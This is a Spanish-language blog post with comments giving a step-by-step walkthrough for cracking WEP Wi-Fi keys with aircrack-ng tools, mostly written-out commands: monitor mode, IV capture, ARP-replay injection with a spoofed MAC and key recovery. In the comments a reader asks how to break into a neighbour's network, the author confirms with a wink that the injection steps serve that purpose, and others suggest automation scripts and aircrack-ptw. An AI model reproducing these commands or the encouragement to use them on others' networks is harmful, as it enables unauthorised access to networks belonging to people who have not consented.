El aburrimiento y ganas de hacer el tonto hizo que descargara Back Track III y lo probara, pues bien, contar que genial y todo a la primera, nos viene con nuevos controladores y a mi, que no me funcionaba bien en mis Apple's, en el MacMini ha funcionado muy bien. Escribo una pequeña guía que he seguido yo y ha funcionado muy bien, sólo hay que usar la consola de BT3:
1.- El primer paso que debe realizar es poner la tarjeta de red en modo monitor:
~# airmon-ng start wlan0
2.- Ahora ejecute airodump-ng para que guarde los paquetes IVs(necesarios para realizar el ataque):
~# airodump-ng -w datos wlan0
Para mejorar el ataque paramos lo anterior con CTRL+c y añadimos a la instrucción el canal específico a capturar(ej. 11):
~#airodump-ng --ivs -w datos -c 11 wlan0
3.- Ahora solo nos falta acelerar el proceso de captura de IVs, mediante el inyectado de tráfico desde el edquipo del atacante. Para ello utilizará el cliente autenificado y asociado en el paso siguiente. Hay que esperar a que capture un paquete ARP-request, para luego reinyectarlo en la red para que aumente drásticamente el número de paquetes IVs:
~# aireplay-ng -3 -b MAC_AP -h MAC_FALSO_CLIENTE -x 600 wlan0
donde -3 indica el tipo de ataque, y -x 600 permite indicar la velocidad con la que reinyecta paquetes.(Utilizar una consola disitinta).
4.- Ahora para poder hacer el inyectado de paquetes va a autentificarse y asociarse con un cliente ficticio de la red:
~#aireplay-ng -1 10 -e essid -a MAC_AP -h MAC_FALSO_CLIENTE wlan0
donde -1 10 indica que va a enviar 10 paquetes de autentificación, -a MAC_AP indica la dirección MAC del punto de acceso y -h MAC_FALSO_CLIENTE indica una dirección MAC falsa.
Último paso.- Ahora ya puede ejecutar en otra consola aircrack-ng para que vaya analizando los paquetes IVs obtenidos por airodump-ng y almacenados en el fichero datos-01.ivs(otra consola):
~#aircrack-ng -0 datos-01.ivs
4 comentarios:
mmmm
muy interesante
para desencriptar la mia estupendo pero... como hago para aunmetar los DATA de mi vecino sin llamar a la puerta y decirleeee ("e tu.. para que copño quieres internet? ...porkno te pones y descargas con tu portatil un puñado de arxivos gordos??") esque para la mia me ha pedido 50000 Paquetes... y sin problema con paciencia se los he dado pero para el vacino....¿? alguna idea?? muxas gracias de antemano un super aporte
Los pasos 3 y 4 son precisamente para eso, para inyectar tráfico al router de tu "amigo" ;)
Weee!
Aqui dejo mi primer comentario en tu blog, en este tema que me parece superinteresante.
Para aquellos a los que no les guste estar tecleando comandos y tal, existe un script que te automatiza todo el proceso: airscript.
Tambien recomiendo la distibución WifiSlax, otro liveCD que contiene todo lo necesario para la desencriptación.
Saludos!
hola
otra forma de obtener la clave
mucho mas facil es utilizar
aircrack-ptw archivo.cap-01.cap
con este comando nos da el pass
sin utilizar la fuerza bruta
solo necesitamos alrrededor de
25000 paquetes
Publicar un comentario